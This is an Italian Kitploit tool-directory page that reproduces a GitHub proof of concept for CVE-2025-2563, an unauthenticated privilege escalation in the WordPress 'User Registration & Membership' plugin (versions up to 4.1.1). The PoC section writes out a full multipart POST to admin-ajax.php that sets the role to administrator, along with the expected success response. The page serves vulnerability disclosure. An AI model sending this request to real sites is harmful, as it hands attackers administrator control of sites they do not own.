Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-2563 — CVE-2025-2563 Prova di concetto | Kitploit
Strumenti/GitHubGitHub/ubaydev/cve-2025-2563
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHububaydev/cve-2025-2563

CVE-2025-2563

CVE-2025-2563 Prova di concetto

Vedi Repository
51 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-2563

User Registration & Membership <= 4.1.1 - Escalatazione dei privilegi non autenticata

Dichiarazione di non responsabilità!

Le informazioni presentate in questo rapporto CVE (Common Vulnerabilities and Exposures) sono solo a scopo educativo e informativo. I dettagli forniti si basano su risorse disponibili pubblicamente, ricerche e analisi condotte dall'autore. Il contenuto non è inteso a promuovere o incoraggiare attività illegali, inclusi hacking, sfruttamento o accesso non autorizzato ai sistemi.

L'autore non si assume alcuna responsabilità per qualsiasi uso improprio delle informazioni presentate. Si raccomanda che individui e organizzazioni applichino queste conoscenze in modo responsabile e nel rispetto delle leggi e dei regolamenti applicabili. I lettori sono fortemente invitati a testare le vulnerabilità solo in ambienti controllati con la dovuta autorizzazione.

L'autore e i collaboratori di questo rapporto non approvano né supportano attività dannose e incoraggiano la divulgazione responsabile e le pratiche di hacking etico.


Descrizione

Una vulnerabilità di sicurezza critica è stata scoperta nel plugin WordPress "User Registration & Membership", uno strumento popolare per creare siti di membership e moduli di registrazione. Il difetto, identificato come CVE-2025-2563, ha un punteggio CVSS di 9.8, a indicare la sua elevata gravità.

Il plugin User Registration & Membership per WordPress è vulnerabile all'escalation dei privilegi nelle versioni fino alla 4.1.1 inclusa. Ciò è dovuto a restrizioni insufficienti sul tipo di ruolo nella funzione 'prepare_members_data()'. Ciò consente ad aggressori non autenticati di creare nuovi account utente con il ruolo 'amministratore', a queste condizioni:

  1. Il plugin ha attivato il componente aggiuntivo per l'abbonamento (membership)
  2. L'utente registrato non necessita di conferma

PoC (Proof of Concept)

  1. Registrati tramite la pagina frontend a /registration o /membership-registration
  2. Dopo la registrazione, utilizza questi dati della richiesta.
    POST /wp-admin/admin-ajax.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
    Accept: */*
    Host: hackthebox.test
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335
    
    ----------------------------189123966817005614765335
    Content-Disposition: form-data; name="action"
    
    user_registration_membership_register_member
    ----------------------------189123966817005614765335
    Content-Disposition: form-data; name="security"
    
    THE_NONCE_HERE
    ----------------------------189123966817005614765335
    Content-Disposition: form-data; name="members_data"
    
    {"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"}
    ----------------------------189123966817005614765335--
    
  3. La risposta deve essere simile a questa:
    {
        "success": true,
        "data": {
            "member_id": 24,
            "transaction_id": "",
            "message": "New member has been successfully created."
        }
    }  
    
  4. Ora puoi accedere all'account registrato con privilegi di amministratore.

Riferimenti

  1. https://plugins.trac.wordpress.org/browser/user-registration/tags/4.1.2/modules/membership/includes/Admin/Services/MembersService.php?rev=3259656#L106
  2. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation
  3. https://securityonline.info/wordpress-plugin-cve-2025-2563-scores-9-8-threatens-thousands-of-membership-sites/

Ringraziamenti

  • https://saweria.co/ubaii
  • https://buymeacoffee.com/ubaii
  • https://trakteer.id/ubaii
Scarica lo strumento